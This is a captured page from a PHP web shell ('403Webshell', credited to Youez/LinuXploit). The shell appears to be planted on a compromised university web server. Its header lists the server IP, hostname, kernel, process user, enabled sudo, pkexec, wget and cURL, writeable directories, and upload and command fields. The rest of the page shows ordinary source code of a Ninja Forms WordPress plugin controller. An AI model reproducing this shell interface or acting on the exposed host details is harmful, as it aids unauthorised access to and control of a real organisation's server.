403Webshell
Server IP : 172.24.0.40  /  Your IP : 216.73.216.10
Web Server : Apache
System : Linux dbweb26.ust.edu.ph 4.18.0-513.5.1.el8_9.x86_64 #1 SMP Fri Sep 29 05:21:10 EDT 2023 x86_64
User : apache ( 48)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/ajels/public_html/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/ajels/public_html/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/SavedFields.php
<?php if ( ! defined( 'ABSPATH' ) ) exit;

class NF_AJAX_Controllers_SavedFields extends NF_Abstracts_Controller
{
    public function __construct()
    {
        /**
         * These Ajax calls are all handled in this file by 'create', 'update',
         * and 'delete', respectively
        */
        add_action( 'wp_ajax_nf_create_saved_field', array( $this, 'create' ) );
        add_action( 'wp_ajax_nf_update_saved_field', array( $this, 'update' ) );
        add_action( 'wp_ajax_nf_delete_saved_field', array( $this, 'delete' ) );
    }

    public function create()
    {
        // Does the current user have admin privileges
        if (!current_user_can(apply_filters('ninja_forms_admin_all_forms_capabilities', 'manage_options'))) {
            $this->_errors[] = esc_html__('Access denied. You must have admin privileges to view this data.', 'ninja-forms');
            $this->_respond();
        }

        check_ajax_referer( 'ninja_forms_builder_nonce', 'security' );

        if( ! isset( $_POST[ 'field' ] ) || empty( $_POST[ 'field' ] ) ){
            $this->_errors[] = esc_html__( 'Field Not Found', 'ninja-forms' );
            $this->_respond();
        }

        $field_settings = json_decode( stripslashes( $_POST[ 'field' ] ), ARRAY_A );

        $field = Ninja_Forms()->form()->field()->get();
        $field->update_settings( $field_settings );
        $field->update_setting( 'saved', 1 );
        $field->save();

        $this->_data[ 'id' ] = $field->get_id();

        $this->_respond();
    }

    public function update()
    {
        // Does the current user have admin privileges
        if (!current_user_can(apply_filters('ninja_forms_admin_all_forms_capabilities', 'manage_options'))) {
            $this->_errors[] = esc_html__('Access denied. You must have admin privileges to view this data.', 'ninja-forms');
            $this->_respond();
        }

        check_ajax_referer( 'ninja_forms_builder_nonce', 'security' );

        if( ! isset( $_POST[ 'field' ] ) || empty( $_POST[ 'field' ] ) ){
            $this->_errors[] = esc_html__( 'Field Not Found', 'ninja-forms' );
            $this->_respond();
        }

        $this->_respond();
    }

    public function delete()
    {
        // Does the current user have admin privileges
        if (!current_user_can(apply_filters('ninja_forms_admin_all_forms_capabilities', 'manage_options'))) {
            $this->_errors[] = esc_html__('Access denied. You must have admin privileges to view this data.', 'ninja-forms');
            $this->_respond();
        }

        check_ajax_referer( 'ninja_forms_settings_nonce', 'security' );

        if( ! isset( $_POST[ 'field' ] ) || empty( $_POST[ 'field' ] ) ){
            $this->_errors[] = esc_html__( 'Field Not Found', 'ninja-forms' );
            $this->_respond();
        }

        $id = absint( $_POST[ 'field' ][ 'id' ] );

        $errors = Ninja_Forms()->form()->get_field( $id )->delete();

        $this->_data[ 'id' ] = $id;
        $this->_data[ 'errors' ] = $errors;

        $this->_respond();
    }


}

Youez - 2016 - github.com/yon3zu
LinuXploit